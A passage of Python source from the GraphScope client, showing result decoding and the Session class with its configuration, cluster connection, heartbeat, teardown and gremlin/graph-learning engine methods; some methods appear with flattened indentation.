                            rets.append(pickle.loads(op_result.result))
                        else:
                            # for nx Graph
                            rets.append(op_result.result.decode("utf-8"))
                    if op.output_types == types_pb2.GREMLIN_RESULTS:
                        rets.append(self._rebuild_gremlin_results(seq, op, op_result))
                    if op.output_types == types_pb2.GRAPH:
                        rets.append(self._rebuild_graph(seq, op, op_result))
                    if op.output_types == types_pb2.LEARNING_GRAPH:
                        rets.append(self._rebuild_learning_graph(seq, op, op_result))
                    if op.output_types == types_pb2.APP:
                        # unbound app: nothing to materialize client-side
                        rets.append(None)
                    if op.output_types == types_pb2.BOUND_APP:
                        rets.append(self._rebuild_app(seq, op, op_result))
                    if op.output_types in (
                        types_pb2.VINEYARD_TENSOR,
                        types_pb2.VINEYARD_DATAFRAME,
                    ):
                        rets.append(
                            json.loads(op_result.result.decode("utf-8"))["object_id"]
                        )
                    if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
                        if (
                            op.type == types_pb2.CONTEXT_TO_DATAFRAME
                            or op.type == types_pb2.GRAPH_TO_DATAFRAME
                        ):
                            rets.append(decode_dataframe(op_result.result))
                        if (
                            op.type == types_pb2.CONTEXT_TO_NUMPY
                            or op.type == types_pb2.GRAPH_TO_NUMPY
                        ):
                            rets.append(decode_numpy(op_result.result))
                    if op.output_types == types_pb2.INTERACTIVE_QUERY:
                        rets.append(self._rebuild_interactive_query(seq, op, op_result))
                    if op.output_types == types_pb2.NULL_OUTPUT:
                        rets.append(None)
                    # first matching result wins; move on to the next op
                    break
        return rets[0] if self._unpack else rets

    def get_dag_for_unload(self):
        """Build a DAG that unloads resources (graph, app, context) created by
        the sub-DAG but not present in the fetches, so lazy-mode runs do not
        leak server-side objects.
        """
        unload_dag = op_def_pb2.DagDef()
        keys_of_fetches = set([op.key for op in self._ops])
        # creation op type -> matching unload op type
        mapping = {
            types_pb2.CREATE_GRAPH: types_pb2.UNLOAD_GRAPH,
            types_pb2.CREATE_APP: types_pb2.UNLOAD_APP,
            types_pb2.RUN_APP: types_pb2.UNLOAD_CONTEXT,
        }
        for op_def in self._sub_dag.op:
            if op_def.op in mapping and op_def.key not in keys_of_fetches:
                unload_op_def = op_def_pb2.OpDef(
                    op=mapping[op_def.op], key=uuid.uuid4().hex
                )
                unload_op_def.parents.extend([op_def.key])
                unload_dag.op.extend([unload_op_def])
        return unload_dag
class Session(object):
"""A class for interacting with GraphScope graph computation service cluster.
A :class:`Session` object encapsulates the environment in which :class:`Operation`
objects are executed/evaluated.
A session may own resources. It is important to release these resources when
they are no longer required. To do this, invoke the :meth:`close` method
on the session.
A Session can register itself as default session with :meth:`as_default`, and all operations
after that will use the default session. Session deregister itself as a default session
when closed.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> # use session object explicitly
>>> sess = gs.session()
>>> g = sess.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(g, 4)
>>> sess.close()
>>> # or use a session as default
>>> sess = gs.session().as_default()
>>> g = gs.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(pg, 4)
>>> sess.close()
We support setup a service cluster and create a RPC session in following ways:
- GraphScope graph computation service run in cluster managed by kubernetes.
>>> s = graphscope.session()
Also, :class:`Session` provides several keyword params for users to define the cluster.
You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
you can find all params detail in :meth:`__init__` method.
>>> s = graphscope.session(
... k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
... k8s_vineyard_cpu=0.1,
... k8s_vineyard_mem="256Mi",
... vineyard_shared_mem="4Gi",
... k8s_engine_cpu=0.1,
... k8s_engine_mem="256Mi")
- or all params can be provided by a json configuration file or configuration dict.
>>> s = graphscope.session(config='/tmp/config.json')
>>> # Or
>>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
"""
    @set_defaults(gs_config)
    def __init__(
        self,
        config=None,
        addr=gs_config.addr,
        mode=gs_config.mode,
        cluster_type=gs_config.cluster_type,
        num_workers=gs_config.num_workers,
        preemptive=gs_config.preemptive,
        k8s_namespace=gs_config.k8s_namespace,
        k8s_service_type=gs_config.k8s_service_type,
        k8s_gs_image=gs_config.k8s_gs_image,
        k8s_etcd_image=gs_config.k8s_etcd_image,
        k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
        k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
        k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
        k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
        k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
        k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
        k8s_etcd_mem=gs_config.k8s_etcd_mem,
        k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
        k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
        k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
        vineyard_shared_mem=gs_config.vineyard_shared_mem,
        k8s_engine_cpu=gs_config.k8s_engine_cpu,
        k8s_engine_mem=gs_config.k8s_engine_mem,
        k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
        k8s_mars_worker_mem=gs_config.mars_worker_mem,
        k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
        k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
        k8s_volumes=gs_config.k8s_volumes,
        k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
        timeout_seconds=gs_config.timeout_seconds,
        dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
        with_mars=gs_config.with_mars,
        enable_gaia=gs_config.enable_gaia,
        reconnect=False,
        **kw,
    ):
        """Construct a new GraphScope session.
        Args:
            config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
                For str, it will identify it as a path and read the configuration file to build a
                session if file exist. If not specified, the global default configuration
                :code:`DEFAULT_CONFIG_FILE` will be used, which get value of GS_CONFIG_PATH
                in environment. Note that it will overwrite explicit parameters. Defaults to None.
            addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
                A new session id will be generated for each session connection.
            mode (str, optional): optional values are eager and lazy. Defaults to eager.
                Eager execution is a flexible platform for research and experimentation, it provides:
                    An intuitive interface: Quickly test on small data.
                    Easier debugging: Call ops directly to inspect running models and test changes.
                Lazy execution means GraphScope does not process the data till it has to. It just gathers all the
                information to a DAG that we feed into it, and processes only when we execute :code:`sess.run(fetches)`
            cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
                Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
            num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
            preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
                as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
                which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
                same value.
            k8s_namespace (str, optional): Contains the namespace to create all resource inside.
                If param missing, it will try to read namespace from kubernetes context, or
                a random namespace will be created and deleted if namespace not exist.
                Defaults to None.
            k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
                Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
            k8s_gs_image (str, optional): The GraphScope engine's image.
            k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
            k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
            k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
            k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
                discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
                a bundled vineyard container otherwise.
            k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
            k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
            vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
            k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
            k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
            k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
            k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
            k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
            k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
            k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
            k8s_mars_worker_cpu (float, optional):
                Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
            k8s_mars_worker_mem (str, optional):
                Minimum number of memory request for mars worker container. Defaults to '4Gi'.
            k8s_mars_scheduler_cpu (float, optional):
                Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
            k8s_mars_scheduler_mem (str, optional):
                Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
            with_mars (bool, optional):
                Launch graphscope with mars. Defaults to False.
            enable_gaia (bool, optional):
                Launch graphscope with gaia enabled. Defaults to False.
            k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
                containers in a pod. Defaults to {}.
                For example, you can mount host path with:
                k8s_volumes = {
                    "my-data": {
                        "type": "hostPath",
                        "field": {
                            "path": "<path>",
                            "type": "Directory"
                        },
                        "mounts": [
                            {
                                "mountPath": "<path1>"
                            },
                            {
                                "mountPath": "<path2>"
                            }
                        ]
                    }
                }
                Or you can mount PVC with:
                k8s_volumes = {
                    "my-data": {
                        "type": "persistentVolumeClaim",
                        "field": {
                            "claimName": "your-pvc-name"
                        },
                        "mounts": [
                            {
                                "mountPath": "<path1>"
                            }
                        ]
                    }
                }
                Also, you can mount a single volume with:
                k8s_volumes = {
                    "my-data": {
                        "type": "hostPath",
                        "field": {xxx},
                        "mounts": {
                            "mountPath": "<path1>"
                        }
                    }
                }
            timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
                k8s_waiting_for_delete is True).
            dangling_timeout_seconds (int, optional): After seconds of client disconnect,
                coordinator will kill this graphscope instance. Defaults to 600.
                Expect this value to be greater than 5 (heartbeat interval).
                Disable dangling check by setting -1.
            k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
            reconnect (bool, optional): When connecting to a pre-launched GraphScope cluster with :code:`addr`,
                the connect request would be rejected with there is still an existing session connected. There
                are cases where the session still exists and user's client has lost connection with the backend,
                e.g., in a jupyter notebook. We have a :code:`dangling_timeout_seconds` for it, but a more
                deterministic behavior would be better.
                If :code:`reconnect` is True, the existing session will be reused. It is the user's responsibility
                to ensure there's no such an active client actually.
                Defaults to :code:`False`.
            **kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
                - k8s_minikube_vm_driver: Deprecated.
                - k8s_client_config (dict, optional):
                    Provide configurable parameters for connecting to remote k8s,
                    which strongly relies on the `kube_config.new_client_from_config` function.
                    eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
                    config_file: Name of the kube-config file.
                    context: set the active context. If is set to None, current_context from config file will be used.
                    persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
                - log_level: Deprecated.
                    Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
                - show_log: Deprecated.
                    Move this param as a global configuration.Set via `graphscope.set_option(show_log=True)`
                - k8s_vineyard_shared_mem: Deprecated.
                    Please use vineyard_shared_mem instead.
                - k8s_gie_graph_manager_image: Deprecated.
                - k8s_gie_graph_manager_cpu: Deprecated.
                - k8s_gie_graph_manager_mem: Deprecated.
                - k8s_zookeeper_image: Deprecated.
                - k8s_zookeeper_cpu: Deprecated.
                - k8s_zookeeper_mem: Deprecated.
        Raises:
            TypeError: If the given argument combination is invalid and cannot be used to create
                a GraphScope session.
        """
        self._config_params = {}
        # named parameters that are copied verbatim into the config dict below
        self._accessable_params = (
            "addr",
            "mode",
            "cluster_type",
            "num_workers",
            "preemptive",
            "k8s_namespace",
            "k8s_service_type",
            "k8s_gs_image",
            "k8s_etcd_image",
            "k8s_image_pull_policy",
            "k8s_image_pull_secrets",
            "k8s_coordinator_cpu",
            "k8s_coordinator_mem",
            "k8s_etcd_num_pods",
            "k8s_etcd_cpu",
            "k8s_etcd_mem",
            "k8s_vineyard_daemonset",
            "k8s_vineyard_cpu",
            "k8s_vineyard_mem",
            "vineyard_shared_mem",
            "k8s_engine_cpu",
            "k8s_engine_mem",
            "k8s_mars_worker_cpu",
            "k8s_mars_worker_mem",
            "k8s_mars_scheduler_cpu",
            "k8s_mars_scheduler_mem",
            "with_mars",
            "enable_gaia",
            "reconnect",
            "k8s_volumes",
            "k8s_waiting_for_delete",
            "timeout_seconds",
            "dangling_timeout_seconds",
        )
        # keyword-only params that are accepted but warned about, then dropped
        self._deprecated_params = (
            "show_log",
            "log_level",
            "k8s_vineyard_shared_mem",
            "k8s_gie_graph_manager_image",
            "k8s_gie_graph_manager_cpu",
            "k8s_gie_graph_manager_mem",
            "k8s_zookeeper_image",
            "k8s_zookeeper_cpu",
            "k8s_zookeeper_mem",
        )
        saved_locals = locals()
        for param in self._accessable_params:
            self._config_params[param] = saved_locals[param]
        # parse config, which should be a path to config file, or dict
        # config has highest priority
        if isinstance(config, dict):
            self._config_params.update(config)
        elif isinstance(config, str):
            self._load_config(config, slient=False)
        elif DEFAULT_CONFIG_FILE:
            # silently ignored when the default config file does not exist
            self._load_config(DEFAULT_CONFIG_FILE)
        # update other optional params
        self._config_params.update(kw)
        # initial setting of cluster_type
        self._cluster_type = self._parse_cluster_type()
        # initial dag
        self._dag = Dag()
        # mars cannot work with run-on-local mode
        if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
            raise NotImplementedError(
                "Mars cluster cannot be launched along with local GraphScope deployment"
            )
        # deprecated params handle
        for param in self._deprecated_params:
            if param in kw:
                warnings.warn(
                    "The `{0}` parameter has been deprecated and has no effect.".format(
                        param
                    ),
                    category=DeprecationWarning,
                )
                if param == "show_log" or param == "log_level":
                    warnings.warn(
                        "Please use `graphscope.set_option({0}={1})` instead".format(
                            param, kw.pop(param, None)
                        ),
                        category=DeprecationWarning,
                    )
                if param == "k8s_vineyard_shared_mem":
                    warnings.warn(
                        "Please use 'vineyard_shared_mem' instead",
                        category=DeprecationWarning,
                    )
                # drop the deprecated key so the leftover-kw check passes
                kw.pop(param, None)
        # update k8s_client_config params
        self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
        # There should be no more custom keyword arguments.
        if kw:
            raise ValueError("Value not recognized: ", list(kw.keys()))
        if self._config_params["addr"]:
            logger.info(
                "Connecting graphscope session with address: %s",
                self._config_params["addr"],
            )
        else:
            logger.info(
                "Initializing graphscope session with parameters: %s",
                self._config_params,
            )
        self._closed = False
        # coordinator service endpoint
        self._coordinator_endpoint = None
        self._launcher = None
        self._heartbeat_sending_thread = None
        self._grpc_client = None
        self._session_id = None  # unique identifier across sessions
        # engine config:
        #
        # {
        #     "experiment": "ON/OFF",
        #     "vineyard_socket": "...",
        #     "vineyard_rpc_endpoint": "..."
        # }
        self._engine_config = None
        # interactive instance related graph map
        self._interactive_instance_dict = {}
        # learning engine related graph map
        self._learning_instance_dict = {}
        self._default_session = None
        # ensure resources are released even if the user never calls close()
        atexit.register(self.close)
        # create and connect session
        with CaptureKeyboardInterrupt(self.close):
            self._connect()
        self._disconnected = False
        # heartbeat
        self._heartbeat_interval_seconds = 5
        self._heartbeat_sending_thread = threading.Thread(
            target=self._send_heartbeat, args=()
        )
        self._heartbeat_sending_thread.daemon = True
        self._heartbeat_sending_thread.start()
        # networkx module
        self._nx = None
def __repr__(self):
return str(self.info)
def __str__(self):
return repr(self)
    @property
    def session_id(self):
        """str: Unique identifier assigned by the coordinator on connect."""
        return self._session_id
    @property
    def dag(self):
        """The session-wide :class:`Dag` that accumulates operations."""
        return self._dag
def _load_config(self, path, slient=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
if not slient:
raise exp
def _parse_cluster_type(self):
if self._config_params["addr"] is not None:
# get the cluster type after connecting
return types_pb2.UNDEFINED
else:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
return types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
return types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
    @property
    def engine_config(self):
        """Show the engine configration associated with session in json format."""
        # populated by _connect(); None until the session is connected
        return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
    @property
    def closed(self):
        """bool: True once :meth:`close` has completed."""
        return self._closed
    def eager(self):
        """Return True when operations are evaluated immediately
        (``mode == "eager"``) instead of being queued into the lazy DAG."""
        return self._config_params["mode"] == "eager"
    def _send_heartbeat(self):
        """Daemon-thread loop: ping the coordinator once per heartbeat interval.

        A failed ping marks the session as disconnected; a later successful
        ping clears the flag.  The loop exits once the session is closed.
        """
        while not self._closed:
            if self._grpc_client:
                try:
                    self._grpc_client.send_heartbeat()
                except Exception as exc:
                    logger.warning(exc)
                    self._disconnected = True
                else:
                    self._disconnected = False
            time.sleep(self._heartbeat_interval_seconds)
    def close(self):
        """Closes this session.
        This method frees all resources associated with the session.
        Note that closing will ignore SIGINT and SIGTERM signal and recover later.
        """
        # block SIGINT/SIGTERM so teardown cannot be interrupted half-way
        with SignalIgnore([signal.SIGINT, signal.SIGTERM]):
            self._close()
    def _close(self):
        """Tear down everything owned by this session (idempotent).

        Order matters: mark closed (stops the heartbeat loop), deregister as
        default session, join the heartbeat thread, close interactive and
        learning instances, shut the gRPC channel, then stop the launcher for
        locally-launched clusters.
        """
        if self._closed:
            return
        # NOTE(review): fixed grace period before teardown -- presumably lets
        # in-flight work settle; confirm whether this delay is still required.
        time.sleep(5)
        self._closed = True
        self._coordinator_endpoint = None
        self._deregister_default()
        if self._heartbeat_sending_thread:
            self._heartbeat_sending_thread.join(
                timeout=self._heartbeat_interval_seconds
            )
            self._heartbeat_sending_thread = None
        self._disconnected = True
        # close all interactive instances
        for instance in self._interactive_instance_dict.values():
            try:
                if instance is not None:
                    instance.close()
            except Exception:
                pass
        self._interactive_instance_dict.clear()
        # close all learning instances
        for instance in self._learning_instance_dict.values():
            try:
                if instance is not None:
                    instance.close()
            except Exception:
                pass
        self._learning_instance_dict.clear()
        if self._grpc_client:
            try:
                self._grpc_client.close()
            except Exception:
                pass
            self._grpc_client = None
            _session_dict.pop(self._session_id, None)
        # clean up
        if self._config_params["addr"] is None:
            # the cluster was launched by this session, so stop it too
            try:
                if self._launcher:
                    self._launcher.stop()
            except Exception:
                pass
            self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self.eager():
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self.eager():
self._learning_instance_dict[instance.object_id] = None
    def __del__(self):
        # cleanly ignore all exceptions
        # (during interpreter shutdown close() may fail arbitrarily)
        try:
            self.close()
        except Exception:  # pylint: disable=broad-except
            pass
def _check_closed(self, msg=None):
"""Internal: raise a ValueError if session is closed"""
if self.closed:
raise ValueError(msg or "Operation on closed session.")
    # Context manager
    def __enter__(self):
        """Context management protocol.
        Returns self and register self as default session.
        """
        self._check_closed()
        self.as_default()
        return self
def __exit__(self, type, value, traceback):
"""Deregister self from the default session,
close the session and release the resources, ignore all exceptions in close().
"""
try:
self._deregister_default()
self.close()
except Exception:
pass
def as_default(self):
"""Obtain a context manager that make this object as default session.
This method is used when a Session is constructed, which will immediately
install self as a default session.
Raises:
ValueError: If default session exist in current context.
Returns:
A context manager using this session as the default session.
"""
if not _default_session_stack.is_cleared():
raise ValueError(
"A default session is already active. You must explicitly call Session.close()."
)
# session context manager
self._default_session = default_session(self)
self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
def _wrapper(self, dag_node):
if self.eager():
return self.run(dag_node)
else:
return dag_node
    def run(self, fetches, debug=False):
        """Run operations of `fetch`.
        Args:
            fetch: :class:`Operation`
        Raises:
            RuntimeError:
                Client disconnect to the service. Or run on a closed session.
            ValueError:
                If fetch is not a instance of :class:`Operation`. Or
                the fetch has been evaluated.
            InvalidArgumentError:
                Not recognized on output type.
        Returns:
            Different values for different output types of :class:`Operation`
        """
        # NOTE(review): the `debug` parameter is currently unused in this body.
        if self._closed:
            raise RuntimeError("Attempted to use a closed Session.")
        if not self._grpc_client:
            raise RuntimeError("Session disconnected.")
        # translate user-facing fetches into the runnable sub-DAG
        fetch_handler = _FetchHandler(self.dag, fetches)
        try:
            response = self._grpc_client.run(fetch_handler.targets)
        except FatalError:
            # a fatal error leaves the backend unusable; release everything
            self.close()
            raise
        if not self.eager():
            # Unload operations that cannot be touched anymore
            dag_to_unload = fetch_handler.get_dag_for_unload()
            try:
                self._grpc_client.run(dag_to_unload)
            except FatalError:
                self.close()
                raise
        # map raw results back onto the structure the user passed in
        return fetch_handler.wrap_results(response)
    def _connect(self):
        """Launch (or attach to) a GraphScope cluster and open the gRPC session.

        Three paths: reuse a pre-launched coordinator via ``addr``; launch on
        kubernetes; or launch locally on hosts.  On success the coordinator's
        reply fills in session id, cluster type, engine config and pod names.
        Any failure after the launcher started triggers a full close().
        """
        if self._config_params["addr"] is not None:
            # try connect to an existing coordinator
            self._coordinator_endpoint = self._config_params["addr"]
        elif self._cluster_type == types_pb2.K8S:
            if (
                self._config_params["k8s_etcd_image"] is None
                or self._config_params["k8s_gs_image"] is None
            ):
                raise K8sError("None image found.")
            if isinstance(
                self._config_params["k8s_client_config"],
                kube_client.api_client.ApiClient,
            ):
                # a ready-made ApiClient object was passed in directly
                api_client = self._config_params["k8s_client_config"]
            else:
                try:
                    api_client = kube_config.new_client_from_config(
                        **self._config_params["k8s_client_config"]
                    )
                except kube_config.ConfigException as e:
                    raise RuntimeError(
                        "Kubernetes environment not found, you may want to"
                        ' launch session locally with param cluster_type="hosts"'
                    ) from e
            self._launcher = KubernetesClusterLauncher(
                api_client=api_client,
                **self._config_params,
            )
        elif (
            self._cluster_type == types_pb2.HOSTS
            and isinstance(self._config_params["hosts"], list)
            and len(self._config_params["hosts"]) != 0
            and self._config_params["num_workers"] > 0
        ):
            # launch coordinator with hosts
            self._launcher = HostsClusterLauncher(
                **self._config_params,
            )
        else:
            raise RuntimeError(
                f"Unrecognized cluster type {types_pb2.ClusterType.Name(self._cluster_type)}."
            )
        # launching graphscope service
        if self._launcher is not None:
            self._launcher.start()
            self._coordinator_endpoint = self._launcher.coordinator_endpoint
        # waiting service ready
        self._grpc_client = GRPCClient(
            self._launcher, self._coordinator_endpoint, self._config_params["reconnect"]
        )
        self._grpc_client.waiting_service_ready(
            timeout_seconds=self._config_params["timeout_seconds"],
        )
        # connect and fetch logs from rpc server
        try:
            # the coordinator reports back the actual deployment facts, which
            # may override what was configured (e.g. num_workers, namespace)
            (
                self._session_id,
                self._cluster_type,
                self._engine_config,
                self._pod_name_list,
                self._config_params["num_workers"],
                self._config_params["k8s_namespace"],
            ) = self._grpc_client.connect(
                cleanup_instance=not bool(self._config_params["addr"]),
                dangling_timeout_seconds=self._config_params[
                    "dangling_timeout_seconds"
                ],
            )
            # fetch logs
            if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
                self._grpc_client.fetch_logs()
            _session_dict[self._session_id] = self
        except Exception:
            self.close()
            raise
    def get_config(self):
        """Get configuration of the session.

        Returns:
            dict: The live parameter dict (mutations affect the session).
        """
        return self._config_params
def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
    """Construct a graph node in this session's DAG.

    See params detail in :class:`graphscope.framework.graph.GraphDAGNode`;
    the node is evaluated immediately when the session is in eager mode.
    """
    node = GraphDAGNode(self, incoming_data, oid_type, directed, generate_eid)
    return self._wrapper(node)
def load_from(self, *args, **kwargs):
    """Load a graph within the session.

    See more information in :meth:`graphscope.load_from`.
    """
    # Temporarily install this session as the default so the module-level
    # loader operates on it.
    with default_session(self):
        graph = graphscope.load_from(*args, **kwargs)
    return graph
def _run_on_local(self):
    """Rewrite the configuration for a single-machine (localhost) launch."""
    self._config_params.update(
        hosts=["localhost"],
        port=None,
        vineyard_socket="",
    )
@set_defaults(gs_config)
def gremlin(self, graph, engine_params=None):
    """Get an interactive engine handler to execute gremlin queries.

    It will return an instance of
    :class:`graphscope.interactive.query.InteractiveQueryDAGNode`, that will
    be evaluated by :meth:`sess.run` in eager mode.

    Note that this method will be executed implicitly in eager mode when a
    property graph is created, and an instance of InteractiveQuery is cached
    in the session if `initializing_interactive_engine` is True. If you want
    to create a new instance under the same graph with different params, you
    should close the existing instance first.

    .. code:: python

        >>> # close and recreate InteractiveQuery in eager mode.
        >>> interactive_query = sess.gremlin(g)
        >>> interactive_query.close()
        >>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})

    Args:
        graph (:class:`graphscope.framework.graph.GraphDAGNode`):
            The graph to create interactive instance.
        engine_params (dict, optional): Configure startup parameters of
            interactive engine. You can also configure this param by
            `graphscope.set_option(engine_params={})`. See a list of
            configurable keys in
            `interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`

    Raises:
        RuntimeError: The graph was created by a different session.
        InvalidArgumentError:
            - :code:`graph` is not a property graph.
            - :code:`graph` is unloaded in eager mode.
        InteractiveEngineInternalError: Engine creation failed, or a cached
            instance is in the failed state.

    Returns:
        :class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
            InteractiveQuery to execute gremlin queries, evaluated in eager mode.
    """
    # An interactive engine is bound to one session; refuse cross-session graphs.
    if self._session_id != graph.session_id:
        raise RuntimeError(
            "Failed to create interactive engine on the graph with different session: {0} vs {1}".format(
                self._session_id, graph.session_id
            )
        )
    # Interactive query instance won't add to self._interactive_instance_dict in lazy mode.
    # self._interactive_instance_dict[graph.vineyard_id] will be None if InteractiveQuery closed
    if (
        self.eager()
        and graph.vineyard_id in self._interactive_instance_dict
        and self._interactive_instance_dict[graph.vineyard_id] is not None
    ):
        # Reuse the cached instance if it is (or becomes) usable.
        interactive_query = self._interactive_instance_dict[graph.vineyard_id]
        if interactive_query.status == InteractiveQueryStatus.Running:
            return interactive_query
        elif interactive_query.status == InteractiveQueryStatus.Failed:
            raise InteractiveEngineInternalError(interactive_query.error_msg)
        else:
            # Initializing.
            # while True is ok, as the status is either running or failed eventually after timeout.
            while True:
                time.sleep(1)
                if interactive_query.status == InteractiveQueryStatus.Running:
                    return interactive_query
                elif interactive_query.status == InteractiveQueryStatus.Failed:
                    raise InteractiveEngineInternalError(
                        interactive_query.error_msg
                    )
    if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
        raise InvalidArgumentError("The graph should be a property graph.")
    if self.eager():
        if not graph.loaded():
            raise InvalidArgumentError("The graph has already been unloaded")
        # cache the instance of interactive query in eager mode
        interactive_query = InteractiveQuery()
        self._interactive_instance_dict[graph.vineyard_id] = interactive_query
    try:
        enable_gaia = self._config_params["enable_gaia"]
        _wrapper = self._wrapper(
            InteractiveQueryDAGNode(self, graph, engine_params, enable_gaia)
        )
    except Exception as e:
        # Record the failure on the cached placeholder so later callers see it.
        if self.eager():
            interactive_query.status = InteractiveQueryStatus.Failed
            interactive_query.error_msg = str(e)
        raise InteractiveEngineInternalError(str(e)) from e
    else:
        if self.eager():
            # Replace the placeholder with the evaluated instance and link it
            # to the graph so unloading the graph can close it.
            interactive_query = _wrapper
            graph._attach_interactive_instance(interactive_query)
    return _wrapper
def learning(self, graph, nodes=None, edges=None, gen_labels=None):
    """Start a graph learning engine.

    .. deprecated::
        Use :meth:`graphlearn` instead.
    """
    # Emit a real DeprecationWarning (the bare warn() default of UserWarning
    # is easy to miss in filters) and attribute it to the caller's line.
    warnings.warn(
        "The method 'learning' has been deprecated, use 'graphlearn' instead.",
        DeprecationWarning,
        stacklevel=2,
    )
    return self.graphlearn(graph, nodes, edges, gen_labels)
def graphlearn(self, graph, nodes=None, edges=None, gen_labels=None):
    """Start a graph learning engine.

    Args:
        graph (:class:`graphscope.framework.graph.GraphDAGNode`): The graph
            to build the learning instance from.
        nodes (list): The node types that will be used for gnn training.
        edges (list): The edge types that will be used for gnn training.
        gen_labels (list): Extra node and edge labels on original graph for gnn training.

    Raises:
        RuntimeError: The graph was created by a different session.
        InvalidArgumentError: The graph is not a property graph, or is
            unloaded in eager mode.

    Returns:
        :class:`graphscope.learning.GraphDAGNode`:
            An instance of learning graph that could be fed to the learning
            engine, evaluated in eager mode.
    """
    if self._session_id != graph.session_id:
        raise RuntimeError(
            "Failed to create learning engine on the graph with different session: {0} vs {1}".format(
                self._session_id, graph.session_id
            )
        )
    # In eager mode, reuse an instance previously created for the same graph.
    if self.eager():
        cached = self._learning_instance_dict.get(graph.vineyard_id)
        if cached is not None:
            return cached
    if graph.graph_type != graph_def_pb2.ARROW_PROPERTY:
        raise InvalidArgumentError("The graph should be a property graph.")
